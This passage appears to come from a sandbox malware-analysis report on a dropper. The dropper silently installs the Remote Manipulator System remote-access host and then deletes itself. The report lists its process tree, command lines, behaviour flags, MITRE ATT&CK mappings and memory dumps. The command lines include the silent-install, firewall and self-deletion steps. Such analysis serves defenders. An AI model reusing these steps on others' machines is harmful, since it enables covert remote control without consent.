  "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:508
- - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\killself.bat
      4⤵
      PID:3680

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 70EB8EAF68D186F751E6E9A4C47A0B00
  2⤵
  - Loads dropped DLL
  PID:1780
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3952
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2312
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3088

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3388
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
  2⤵
  - Executes dropped EXE
  PID:3848
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
    "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1516

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:1720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/404-148-0x0000000000C40000-0x0000000000C63000-memory.dmp

Filesize
140KB

Download
memory/656-126-0x00000000008E0000-0x00000000008E2000-memory.dmp

Filesize
8KB

Download
memory/1040-128-0x000001AA3CFA0000-0x000001AA3CFA2000-memory.dmp

Filesize
8KB

Download
memory/1040-127-0x000001AA3CFA0000-0x000001AA3CFA2000-memory.dmp

Filesize
8KB

Download
memory/1244-146-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/1244-147-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/1516-189-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/1780-153-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/1780-154-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/2008-186-0x0000000000A90000-0x0000000000A91000-memory.dmp

Filesize
4KB

Download
memory/2312-163-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/2936-138-0x0000000002426000-0x0000000002428000-memory.dmp

Filesize
8KB

Download
memory/2936-115-0x00007FF806070000-0x00007FF806BCD000-memory.dmp

Filesize
11.4MB

Download
memory/2936-116-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/3088-178-0x0000000000B40000-0x0000000000BEE000-memory.dmp

Filesize
696KB

Download
memory/3388-180-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3620-150-0x000001CC6DB10000-0x000001CC6DB12000-memory.dmp

Filesize
8KB

Download
memory/3620-151-0x000001CC6DB10000-0x000001CC6DB12000-memory.dmp

Filesize
8KB

Download
memory/3848-185-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

Filesize
4KB

Download
memory/3952-162-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download